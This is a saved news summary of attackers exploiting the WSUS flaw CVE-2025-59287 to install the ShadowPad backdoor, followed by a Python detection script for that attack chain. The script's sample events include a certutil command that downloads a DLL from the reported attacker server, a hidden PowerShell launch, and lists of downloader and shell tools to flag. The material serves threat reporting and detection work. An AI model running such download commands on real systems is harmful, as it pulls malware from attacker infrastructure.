Saved February 14, 2026
Do you care about this?
Threat actors are using a recently patched vulnerability in Microsoft WSUS, known as CVE-2025-59287, to distribute ShadowPad malware. This backdoor, linked to Chinese hacking groups, allows attackers to execute commands and install additional malicious tools on compromised systems.
If you do, here's more
A recent security flaw in Microsoft Windows Server Update Services (WSUS), identified as CVE-2025-59287, has been exploited by cybercriminals to distribute ShadowPad malware. The attackers specifically targeted Windows Servers with WSUS enabled, gaining initial access through the critical deserialization vulnerability that allows remote code execution with system privileges. AhnLab Security Intelligence Center reported that the attackers utilized PowerCat, an open-source PowerShell utility, to obtain a system shell and subsequently downloaded ShadowPad using tools like certutil and curl.
ShadowPad, which emerged in 2015 and is considered a successor to PlugX, is a modular backdoor linked to Chinese state-sponsored hacking groups. The malware is known for its stealth and for its ability to load additional plugins from embedded shellcode directly into memory. It is installed through DLL side-loading, in which a legitimate signed binary is used to execute a malicious DLL payload, and it also employs various anti-detection mechanisms and persistence techniques.
The exploitation of CVE-2025-59287 has gained momentum since proof-of-concept code for the vulnerability became publicly available. AhnLab highlighted the severity of the issue, emphasizing that it allows attackers to conduct reconnaissance and drop legitimate tools alongside ShadowPad. The specific external server used for downloading the malware was identified as "149.28.78[.]189:42306." The rapid weaponization of this vulnerability underscores the ongoing threat landscape surrounding vulnerable WSUS instances.
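The chain described above (WSUS process spawning a shell, then certutil or curl fetching a payload from the named server) can be turned into simple process-creation detection logic. The following is an added example, not code from the article or from AhnLab; the WSUS parent process names and the Sysmon-style event layout are assumptions, and the sample events are constructed.

```python
import re

# Indicator quoted in the article (defanged there as 149.28.78[.]189:42306).
KNOWN_C2 = "149.28.78.189:42306"
# Assumed WSUS parent process names; an assumption, not stated in the article.
WSUS_PARENTS = {"wsusservice.exe", "w3wp.exe"}
DOWNLOADERS = {"certutil.exe", "curl.exe"}
SHELLS = {"powershell.exe", "cmd.exe"}
URL_RE = re.compile(r"https?://([\w.\-]+(?::\d+)?)", re.IGNORECASE)


def _basename(path: str) -> str:
    """Last path component, lower-cased (handles Windows and POSIX separators)."""
    return re.split(r"[\\/]", path)[-1].lower()


def classify_event(ev: dict) -> list:
    """Return the reasons a process-creation event matches this chain (empty if none)."""
    image, parent = _basename(ev["Image"]), _basename(ev["ParentImage"])
    cmd = ev["CommandLine"]
    reasons = []
    # Rule 1: a WSUS service process spawning a shell or a LOLBin downloader.
    if parent in WSUS_PARENTS and image in SHELLS | DOWNLOADERS:
        reasons.append("wsus-spawned-" + image)
    # Rule 2: certutil/curl invoked with a URL; escalate if it is the known C2.
    if image in DOWNLOADERS:
        hosts = [m.group(1).lower() for m in URL_RE.finditer(cmd)]
        if hosts:
            reasons.append("downloader-with-url")
        if KNOWN_C2 in hosts:
            reasons.append("known-c2:" + KNOWN_C2)
    return reasons


# Constructed Sysmon-style events (not real telemetry); fields mirror Event ID 1.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Update Services\Service\WsusService.exe",
     "CommandLine": "powershell.exe -nop -w hidden -ep bypass"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "certutil -urlcache -split -f http://149.28.78.189:42306/sp.dll C:\\ProgramData\\sp.dll"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "certutil -verify C:\\temp\\cert.cer"},
]


def triage(events) -> dict:
    """Map each matching event's command line to its reasons; benign events are dropped."""
    return {e["CommandLine"]: classify_event(e) for e in events if classify_event(e)}
```

Rule 2 on its own will also fire on legitimate certutil or curl downloads, so the known-C2 match and the WSUS parent are what raise an alert from "review" to "respond".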